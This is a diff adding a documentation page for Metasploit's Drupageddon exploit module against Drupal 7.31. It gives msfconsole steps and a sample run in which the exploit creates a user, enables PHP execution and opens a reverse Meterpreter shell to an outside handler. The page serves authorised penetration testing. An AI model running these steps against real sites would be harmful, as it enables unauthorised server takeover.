|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz) |
| 4 | + |
| 5 | +## Verification Steps |
| 6 | + |
| 7 | + 1. Install the application |
| 8 | + 2. Start msfconsole |
| 9 | + 3. Do: `use exploit/multi/http/drupal_drupageddon` |
| 10 | + 4. Do: `set rhost <ip>` |
| 11 | + 5. Do: `run` |
| 12 | + 6. You should get a shell. |
| 13 | + |
| 14 | +## Scenarios |
| 15 | + |
| 16 | + This is a run against a Drupal 7.31 linux box. |
| 17 | + |
| 18 | + ``` |
| 19 | +msf > use exploit/multi/http/drupal_drupageddon |
| 20 | +msf exploit(drupal_drupageddon) |
| 21 | +msf exploit(drupal_drupageddon) > set rhost 1.1.1.1 |
| 22 | +rhost => 1.1.1.1 |
| 23 | +msf exploit(drupal_drupageddon) > set verbose true |
| 24 | +verbose => true |
| 25 | +msf exploit(drupal_drupageddon) > exploit |
| 26 | +
|
| 27 | +[*] Started reverse TCP handler on 2.2.2.2:4444 |
| 28 | +[*] Testing page |
| 29 | +[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go |
| 30 | +[*] form_token: |
| 31 | +[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00 |
| 32 | +[*] Creating new user AaCaUlLaPR:AAgeAAAAjA |
| 33 | +[*] Logging in as AaCaUlLaPR:AAgeAAAAjA |
| 34 | +[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg; |
| 35 | +[*] Trying to parse enabled modules |
| 36 | +[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0 |
| 37 | +[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E |
| 38 | +[*] Enabling the PHP filter module |
| 39 | +[*] Setting permissions for PHP filter module |
| 40 | +[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA |
| 41 | +[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1 |
| 42 | +[*] admin role id: 3 |
| 43 | +[*] Getting tokens from create new article page |
| 44 | +[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs |
| 45 | +[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA |
| 46 | +[*] Calling preview page. Exploit should trigger... |
| 47 | +[*] Sending stage (33721 bytes) to 1.1.1.1 |
| 48 | +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400 |
| 49 | +
|
| 50 | +meterpreter > sysinfo |
| 51 | +Computer : drupal |
| 52 | +OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64 |
| 53 | +Meterpreter : php/linux |
| 54 | +
|
| 55 | +meterpreter > getuid |
| 56 | +Server username: apache (48) |
| 57 | + ``` |
0 commit comments